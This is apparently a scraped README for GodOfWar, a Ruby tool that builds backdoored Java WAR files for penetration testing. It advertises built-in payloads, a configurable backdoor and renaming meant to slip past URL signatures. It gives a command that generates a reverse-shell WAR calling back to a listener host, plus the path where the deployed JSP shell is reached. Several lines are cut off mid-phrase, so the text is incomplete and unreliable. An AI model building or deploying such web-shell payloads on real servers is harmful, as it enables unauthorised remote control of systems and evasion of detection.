godofwar: Malicious Java WAR builder with built-in payloads
GodOfWar – Malicious Java WAR builder
A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.
- Preexisting payloads. (try
- Configurable backdoor. (try
- Control over payload name.
- To avoid malicious name after deployment to bypass URL name signatures.
$ gem install godofwar
Add More Backdoors
To contribute by adding more backdoors:
- create a new folder under
- put your
jspfile under the newly created directory (make it the same directory name).
- supported operating system (try to make it universal though).
- configurations: default host and port.
- references: the payload origin or its creator credits.
List all payloads
Generate payload with LHOST and LPORT
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
After deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)